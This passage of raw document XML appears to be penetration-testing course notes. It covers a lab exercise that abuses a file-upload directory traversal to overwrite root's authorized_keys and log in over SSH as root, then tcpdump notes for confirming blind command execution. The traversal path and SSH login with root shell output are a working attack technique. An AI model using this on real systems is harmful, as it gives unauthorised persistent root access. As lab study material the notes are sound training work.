          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D27">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 38 - Prepare authorized_keys file for File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D28">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file contains our public key, we can upload it using the relative path </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../root/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will select our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the file upload form and enable intercept in Burp before we click on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> button. When Burp shows the intercepted request, we can modify the filename accordingly and press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D29">
      <w:pPr>
        <w:ind w:left="-1350" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7747674" cy="2644639"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 22: Exploit File Upload to write authorized_keys file in root home directory" id="288" name="image273.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 22: Exploit File Upload to write authorized_keys file in root home directory" id="0" name="image273.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7747674" cy="2644639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 22: Exploit File Upload to write authorized_keys file in root home directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 22 shows the specified relative path for our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. If we've successfully overwritten the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, we should be able to use our private key to connect to the system via SSH. We should note that often the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user does not carry SSH access permissions. However, since we can't check for other users by, for example, displaying the contents of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, this is our only option.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The target system runs an SSH server on port 2222. Let's use the corresponding private key of the public key in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to try to connect to the system. We'll use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to specify our private key and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Directory Traversal Learning Unit, we connected to port 2222 on the host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mountaindesserts.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and our Kali system saved the host key of the remote host. Since the target system of this section is a different machine, SSH will throw an error because it cannot verify the host key it saved previously. To avoid this error, we'll delete the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">known_hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file before we connect to the system. This file contains all host keys of previous SSH connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm ~/.ssh/known_hosts</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -p 2222 -i fileup root@mountaindesserts.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The authenticity of host '[mountaindesserts.com]:2222 ([192.168.50.16]:2222)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ED25519 key fingerprint is SHA256:R2JQNI3WJqpEehY2Iv9QdlMAoeB3jnPvjJqqfDZ3IXU.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This key is not known by any other names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@76b77a6eae51:~#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D37">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 39 - Using the SSH key to successufully connect via SSH as the root user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D38">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could successfully connect as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with our private key due to the overwritten </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. Facing a scenario in which we can't use a file upload mechanism to upload executable files, we'll need to get creative to find other vectors we can leverage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D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3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c4pf4ywjliw3" w:id="115"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump can be used to receive network traffic, like a ping, to see if a target machine is able to ping your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D42">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i tun0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Specifies the interface to listen on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">icmp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A filter expression: capture only ICMP packets (Internet Control Message Protocol), which includes things like ping requests and replies (echo request/reply).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -ni tun0 icmp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(same as command above but with the -n flag)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1307"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells tcpdump not to resolve hostnames or service names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1307"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without -n, tcpdump tries to resolve IP addresses to domain names (using DNS) and port numbers to service names (like showing echo instead of port 7).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1307"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With -n, you get raw IP addresses and port numbers, which is faster and avoids extra network noise.</w:t>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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68m31gv10nms" w:id="116"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to send pings to Kali from target machine to check if you have command execution blindly (using tcpdump)</w:t>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t xml:space="preserve">In the MedTech Challenge Lab, we got blind sql injection, but since it's blind we had no way of checking if our command execution worked, so we can use this technique to ping out kali and see if we can execute commands and also to see if victim can access our kali IP</w:t>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t xml:space="preserve">On Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
